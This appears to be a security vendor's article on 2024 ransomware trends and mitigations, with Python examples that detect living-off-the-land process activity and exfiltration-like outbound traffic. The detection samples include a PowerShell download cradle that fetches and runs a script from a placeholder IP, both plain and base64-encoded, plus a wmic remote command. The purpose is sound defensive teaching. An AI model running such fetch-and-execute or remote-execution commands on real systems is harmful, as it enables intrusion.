
The Evolution of Ransomware in 2024

The Evolution of Ransomware in 2024 (often abbreviated as CP-EVO) explores the latest trends in ransomware-as-a-service and how organizations can prepare for advanced extortion tactics. The shift it describes, from opportunistic encryption to industrialised, multi-stage extortion, affects organizations globally and changes what threat intelligence teams need to watch for.

Executive Summary

Ransomware has transitioned from simple opportunistic attacks to highly sophisticated, multi-stage extortion campaigns. In 2024 the "Ransomware-as-a-Service" (RaaS) model has matured: established operations such as LockBit 3.0 and ALPHV (BlackCat) build and maintain the encryptors, leak sites and data-exfiltration tooling, and rent them to affiliates, so even low-skilled threat actors can run an intrusion that looks like the work of a top-tier group.

Key Trends in 2024

1. Data Exfiltration over Encryption

Many attackers are placing less weight on encrypting files, which a victim with sound backups can recover from, and more on "extortion-only" attacks: they steal sensitive data and threaten to publish it unless a ransom is paid. Skipping the encryptor also removes the noisiest stage of the intrusion, the one most likely to be caught by modern EDR (Endpoint Detection and Response) tooling, although the exfiltration itself still leaves network telemetry that a monitoring team can act on. A confirmed theft of personal information increasingly triggers breach-notification obligations under data privacy laws, for example POPIA Section 22 (notification of security compromises) in South Africa.

2. Targeting the Supply Chain

Instead of attacking a single company, actors target software providers, managed service firms and the edge appliances that connect them to their customers, often exploiting vulnerabilities like CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) in Ivanti Connect Secure, which were chained together in the wild in early 2024. By compromising one "hub" organization, they gain a foothold in hundreds of downstream clients simultaneously.

3. Living off the Land (LotL)

Attackers increasingly use legitimate administrative tools already present on a system (PowerShell, WMI, PsExec and similar) to carry out their activity. Because these binaries are signed and expected, file-based and hash-based detection has little to alert on, and the attacker may never need to write a new executable to disk. Detection therefore has to move to behaviour: which process launched the tool, what command line it received, and whether that pattern is normal for that host and user.
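The behavioural angle is easier to see in code. The block below is an added example written for this page, not code from Cyberpro or from any product it describes. It runs a handful of detection rules covering the three tool families named above over constructed process-creation events (the event schema, hostnames and users are assumptions), and it decodes PowerShell's -EncodedCommand payload so that a download cradle hidden in base64 is still caught.

```python
import base64
import re
from pathlib import PureWindowsPath

# Constructed sample records modelled on Sysmon Event ID 1 / Windows 4688
# process-creation telemetry. Events, hostnames and field names are written
# for this example (an assumed schema, not a vendor's); none of it is real data.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()  # the form -Enc expects

SAMPLE_EVENTS = [
    {"host": "WS-042", "user": "CORP\\j.doe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"host": "WS-042", "user": "CORP\\j.doe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": f'powershell -ep bypass -c "{CRADLE}"'},
    {"host": "SRV-FILE01", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\PSEXESVC.exe", "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\PSEXESVC.exe"},
    {"host": "WS-042", "user": "CORP\\j.doe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'wmic /node:SRV-FILE01 process call create "cmd /c whoami > c:\\x.txt"'},
    {"host": "SRV-FILE01", "user": "CORP\\j.doe",
     "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "cmd /c whoami > c:\\x.txt"},
    # Benign: a scheduled backup script and an interactive editor launch.
    {"host": "SRV-FILE01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"host": "WS-042", "user": "CORP\\j.doe",
     "image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe notes.txt"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SHELLS = POWERSHELL | {"cmd.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
DOWNLOAD_CRADLE = re.compile(
    r"(?i)\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b")
WMIC_CREATE = re.compile(r"(?i)\bprocess\s+call\s+create\b")


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def evaluate(event: dict) -> list[str]:
    """Return the names of the living-off-the-land rules one process-creation event matches."""
    image, parent, cmdline = basename(event["image"]), basename(event["parent_image"]), event["cmdline"]
    hits: list[str] = []
    if image in POWERSHELL:
        if ENCODED_FLAG.search(cmdline):
            hits.append("powershell_encoded_command")
        # Look for a cradle in the visible command line AND in the decoded payload.
        if DOWNLOAD_CRADLE.search(cmdline + " " + decode_encoded_command(cmdline)):
            hits.append("powershell_download_cradle")
        if parent in OFFICE_APPS:
            hits.append("powershell_spawned_by_office")
    if image == "psexesvc.exe" or (image.startswith("psexec") and "\\\\" in cmdline):
        hits.append("psexec_remote_execution")
    if image == "wmic.exe" and WMIC_CREATE.search(cmdline):
        hits.append("wmic_process_call_create")
    if parent == "wmiprvse.exe" and image in SHELLS:
        hits.append("shell_spawned_by_wmi_provider")
    return hits


def scan(events: list[dict]) -> list[dict]:
    """Flatten rule matches across a batch of events into alert records."""
    return [{"host": e["host"], "user": e["user"], "rule": rule, "cmdline": e["cmdline"]}
            for e in events for rule in evaluate(e)]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['host']:<11} {alert['rule']:<32} {alert['cmdline'][:70]}")
```

The last two sample events show the trade-off: a scheduled PowerShell script launched by a service and an editor started from Explorer produce no hits, while the same powershell.exe binary launched by Word with a cradle, or with a hidden window and an encoded payload, does. In production the parent-process and office-application rules are where most tuning happens, because they encode what is normal for a given fleet rather than anything intrinsic to the binary.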

Mitigation Strategies

  • Immutable Backups: Ensure that backups cannot be deleted or modified even if administrative credentials are compromised, for example with write-once retention that not even the backup administrator can shorten, and test restores regularly so the backups are known to be usable.
  • Zero Trust Architecture: Restrict lateral movement within the network so that a single compromised endpoint doesn't lead to a full-domain takeover. See our Zero Trust Architecture Guide for more details, or explore our ZTNA solutions.
  • Continuous Monitoring: Implement 24/7 SOC monitoring to identify the early warning signs of exfiltration, such as a host sending far more data outbound than its own recent baseline, or large transfers to a destination the organisation has never contacted before. AI-driven monitoring is particularly effective here.
  • ISO Standards Alignment: Implementing frameworks like ISO/IEC 27001 helps structure incident response and risk management appropriately.
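As an added example (not from the original page or any Cyberpro product) of the early-warning check the monitoring bullet refers to, and of why the extortion-only trend described earlier still leaves a detectable trace on the wire: per-host outbound volume is compared with that host's own recent baseline, so a backup server that legitimately ships gigabytes every night is not flagged, while a workstation that suddenly sends several gigabytes to a never-before-seen address is. The flow records, hostnames, destinations and thresholds are constructed for illustration and are assumptions, not measured values.

```python
from collections import defaultdict
from statistics import median

MB = 1_000_000
GB = 1_000 * MB

# Constructed daily outbound flow summaries, as a proxy or firewall log pipeline
# might aggregate them: (day, source host, destination, bytes sent). Not real data.
SAMPLE_FLOWS = [
    # Baseline days.
    ("2024-03-01", "WS-042", "cdn.example-saas.com", 180 * MB),
    ("2024-03-02", "WS-042", "cdn.example-saas.com", 150 * MB),
    ("2024-03-03", "WS-042", "cdn.example-saas.com", 210 * MB),
    ("2024-03-01", "SRV-FILE01", "backup.example-cloud.com", 2000 * MB),
    ("2024-03-02", "SRV-FILE01", "backup.example-cloud.com", 2200 * MB),
    ("2024-03-03", "SRV-FILE01", "backup.example-cloud.com", 1900 * MB),
    # Day under review.
    ("2024-03-04", "WS-042", "cdn.example-saas.com", 160 * MB),
    ("2024-03-04", "WS-042", "203.0.113.9", 9500 * MB),          # first-seen destination, huge volume
    ("2024-03-04", "SRV-FILE01", "backup.example-cloud.com", 2100 * MB),  # normal for this host
    ("2024-03-04", "WS-077", "cdn.example-saas.com", 300 * MB),   # new host, no baseline, small volume
]


def build_baseline(flows, day):
    """Per-host daily outbound totals and destinations from flows strictly before `day`."""
    totals = defaultdict(lambda: defaultdict(int))  # host -> day -> bytes
    seen = defaultdict(set)                         # host -> destinations ever contacted
    for d, host, dst, nbytes in flows:
        if d < day:                                 # ISO dates sort correctly as strings
            totals[host][d] += nbytes
            seen[host].add(dst)
    return totals, seen


def detect_exfiltration(flows, day, ratio_threshold=5.0, min_bytes=1 * GB):
    """Flag hosts whose outbound volume on `day` is both large in absolute terms and
    far above their own median daily volume; report destinations never seen before."""
    baseline_totals, seen = build_baseline(flows, day)
    today = defaultdict(int)
    today_dsts = defaultdict(set)
    for d, host, dst, nbytes in flows:
        if d == day:
            today[host] += nbytes
            today_dsts[host].add(dst)

    alerts = []
    for host, total in sorted(today.items()):
        history = list(baseline_totals[host].values())
        base = median(history) if history else 0
        ratio = total / base if base else float("inf")  # no history: only min_bytes protects us
        if total >= min_bytes and ratio >= ratio_threshold:
            alerts.append({
                "host": host,
                "bytes_today": total,
                "baseline_median": base,
                "ratio": ratio,
                "new_destinations": sorted(today_dsts[host] - seen[host]),
            })
    return alerts


if __name__ == "__main__":
    for a in detect_exfiltration(SAMPLE_FLOWS, "2024-03-04"):
        print(f"{a['host']}: {a['bytes_today'] / GB:.1f} GB today vs median "
              f"{a['baseline_median'] / GB:.2f} GB (x{a['ratio']:.0f}); new destinations: {a['new_destinations']}")
```

Two design points matter more than the exact thresholds. The ratio is taken against the host's own median, not a fleet-wide average, which is what keeps SRV-FILE01's nightly 2 GB out of the alert list. And a host with no history at all gets an infinite ratio, so the absolute floor (min_bytes) is the only thing stopping every newly imaged workstation from alerting on its first day; pick it from real data rather than from this example.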